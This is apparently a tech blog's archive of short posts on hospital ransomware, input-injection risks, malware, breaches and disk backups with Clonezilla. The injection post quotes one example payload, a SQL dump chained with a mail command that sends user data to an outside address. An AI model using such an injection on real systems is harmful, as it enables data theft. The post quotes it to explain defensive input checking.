Category: Tech

Not Paranoid Enough

The Regina Leader-Post Editorial Board echoes my concerns over giving the Internet access to patient records. However, the editorial focuses mainly on the threat from allowing external access.
By far, the largest threat vector is internal in origin, and I’m not just talking about a disgruntled employee. Any employee who brings in their own device, checks email or surfs the web at work, plays Facebook games, or VPNs in from home is a potential point of vulnerability.
This just happened.

A hospital in Los Angeles has been operating without access to email or electronic health records for more than a week, after hackers took over its computer systems and demanded millions of dollars in ransom to return it.

Based on the article, it looks like the hospital was hit with a version of the Cryptolocker software. That means that some employee in the hospital, or someone who has an ‘always-on’ VPN connection to the hospital and has mapped a drive to the data at the hospital, became the accomplice.
No matter how hard you lock down a network or a computer the single largest point of failure is always between the keyboard and the seat.

You Light Up My File

I like my prehistoric flip phone better with every passing day. (From August of 2015)

Who has a flashlight app on their phone, you need to see this!!!

Posted by Disturb Reality on Thursday, 20 August 2015

From the “This is Cool” Dept.

An advancement in desalination techniques.

Instead, the system uses an electrically driven shockwave within a stream of flowing water, which pushes salty water to one side of the flow and fresh water to the other, allowing easy separation of the two streams. The new approach is described in the journal Environmental Science and Technology Letters, in a paper by professor of chemical engineering and mathematics Martin Bazant, graduate student Sven Schlumpberger, undergraduate Nancy Lu, and former postdoc Matthew Suss.

Hmm? No gender studies majors?

The good old days

Back when I started programming networked applications, the big threat was injection techniques against a CGI program. Back then, it was easy: use strict;, -T (taint check), and check everything that you didn’t write. That’s why you always had the “password can only be alpha-numeric +@#^&)-” style messages. We were checking what you entered to make sure it didn’t have a “SELECT * INTO OUTFILE "~/out.txt" from users; mail -s out.txt -f ~/out.txt bad.address@home.com” in the form.
It’s the same old problem. Except this time, if you accept REST or JSON via a Java-based application server, you should be concerned.
And before anyone dismisses this, ask yourself how the MLS system shares information.

Black Hat/White Hat

This is a first, as far as I can tell.

Instead, the author or authors of the malware appear to be using it to actually secure infected devices. Symanetc [sic] believes the malware has infected tens of thousands of routers and other IoT systems around the world. Yet, in the two months that the security vendor has been tracking Linux.Wifatch it has not seen the malware tool being used maliciously even once.

It’s Probably Nothing

Months later, the OPM and Department of Defense (DoD) confessed that “Of the 21.5 million individuals whose Social Security Numbers and other sensitive information were impacted by the breach, the subset of individuals whose fingerprints have been stolen has increased from a total of approximately 1.1 million to approximately 5.6 million.”

Tempest in a Teapot

This article by Steven J. Vaughan-Nichols leaves hanging the suggestion that add-on developers are going to be leaving Firefox for other browsers. What he doesn’t tell you is that all browsers are changing their internal structure. Chrome is dumping NPAPI for WebGL. Windows 10’s Edge is completely new.
Given the plethora of patches, updates and vulnerabilities that all web browsers are facing these days, I welcome a more secure environment to surf with.

29Jul15, Win 10 and you.

If you haven’t signed up, wait. If you have, then I recommend using Clonezilla this weekend to snapshot your hard drive. MSFT has assured us that all machines running Win7 or Win8/8.1 will support Win10. I guess we’ll see.
Clonezilla is a Linux-based boot disk (CD/USB) that will ‘ghost’ your drive sector by sector. It writes a recoverable image to an external USB drive. If you speak the language, it’s basically dd > tar > gz, although it offers a variety of options.
I plan on running it tonight on my Win7 machine that will be upgraded to Win10 on the 29th.
It’s a very easy program to use, just _read_ all of the dialog screens. There are only two things you really need to be absolutely sure of:
  1. Which is the device you’re writing to, and
  2. Which is the device you’re reading from.
You really don’t want to get those mixed up.
On average, over USB 2.0, it’ll take about 1 hour per 100G of data depending on the data. It compresses and packs the data in (default) 2GB files. It’s a sector copy so you can’t use it to retrieve specific files, it will recover all of the drive, all of a partition, or nothing.
I use it on every machine that comes into my shop, before I start working on it. If I screw up and make a machine unusable, I need to be able to return the machine to the state in which I received it. I’ve recovered from the Clonezilla images exactly twice, once on WinXP and once on Win7. Both recoveries performed as expected.
Instructions are on the site on how to burn the ISOs to a CDROM or to extract the Zip file to a USB thumb device, so all you really need is a suitably sized external USB hard drive.
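As an added illustration of the dd > tar > gz pipeline described above (this is example code written for this page, not Clonezilla’s own), here is a small shell script that images a device into compressed 2GB chunks, records a checksum so the image can be verified, and refuses the source/destination mix-up the post warns about. It assumes GNU coreutils (dd, split, sha256sum) and gzip; the function names image_device and verify_image are my own.

```shell
#!/bin/sh
# Added example (not Clonezilla's code): the dd > gzip pipeline the post describes,
# with the source/destination sanity checks it warns about. Assumes GNU coreutils
# (dd status=none, split -d) and gzip; CHUNK defaults to Clonezilla's 2G pieces.
set -eu

# image_device SRC DESTDIR [CHUNK]: sector copy of SRC into compressed chunks
# under DESTDIR, plus a checksum of the raw stream so a restore can be verified.
image_device() {
  src=$1; dest=$2; chunk=${3:-2G}
  [ -r "$src" ] || { echo "source $src is not readable" >&2; return 1; }
  [ ! -d "$src" ] || { echo "source $src is a directory, not a device" >&2; return 1; }
  mkdir -p "$dest"
  # Refuse to write the image onto the very device being read. This catches the
  # common mix-up, but not a destination on another partition of the same disk.
  fsdev=$(df -P "$dest" | awk 'NR==2 {print $1}')
  [ "$fsdev" != "$src" ] || { echo "$dest lives on $src; pick another drive" >&2; return 1; }
  # One extra read of the source records what the image must decompress back to.
  sha256sum < "$src" | awk '{print $1}' > "$dest/image.sha256"
  dd if="$src" bs=1M status=none | gzip -c | split -b "$chunk" -d - "$dest/image.gz."
}

# verify_image DESTDIR: reassemble the chunks, decompress, and compare the hash.
# A restore is the same pipe ending in dd of=<device> instead of sha256sum.
verify_image() {
  dest=$1
  expected=$(cat "$dest/image.sha256")
  actual=$(cat "$dest"/image.gz.* | gzip -dc | sha256sum | awk '{print $1}')
  [ "$expected" = "$actual" ] || { echo "image in $dest does not match its checksum" >&2; return 1; }
  echo "image in $dest verified ($actual)"
}
```

Like Clonezilla, this is a whole-device copy: you get the entire drive back or nothing, so verify the image before you touch the machine.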

Best practices, phaw.

The Register reports on the ‘new’ marching orders from the WH to gov’t IT.

In response to this week’s data breach at the US Office of Personnel Management, the White House has ordered federal agencies to immediately deploy state-of-the-art anti-hacker defenses – things like installing security patches, and not giving everyone the admin password.

I shake my head.

  1. Install software patches for critical vulnerabilities “without delay.”
  2. Use antivirus and check log files for “indicators” of malware infection or intrusion.
  3. Start using two-factor authentication.
  4. Slash the number of people with administrator-level access and limit what they can do and for how long per-login-session, and “ensure that privileged user activities are logged and that such logs are reviewed regularly.”

Can anyone in IT tell me why 1, 2 and 4 are not standard operating procedure?
I’ll give them a break on 3, because two-factor ID is a tough nut. User + machine, user + user, user + IP, user + BYOD, etc. can be difficult to integrate into a system.
I have some sympathy, though. You know how this happens? Every title needs a local wireless printer, ’cause, status. Then the users complain ’cause they can’t send email from their iPhone. And, “why can’t I use my Samsung tablet instead of that dirty old desktop?” “What do you mean the systems are going down for a restart? We can’t do that!” And pretty soon IT is just saying, “Screw it, I’m not going to bother fighting with senior management over what they see as nothing.” And you have a zillion holes in your perimeter.
How’s your network’s perimeter? Have you chosen convenience over security?
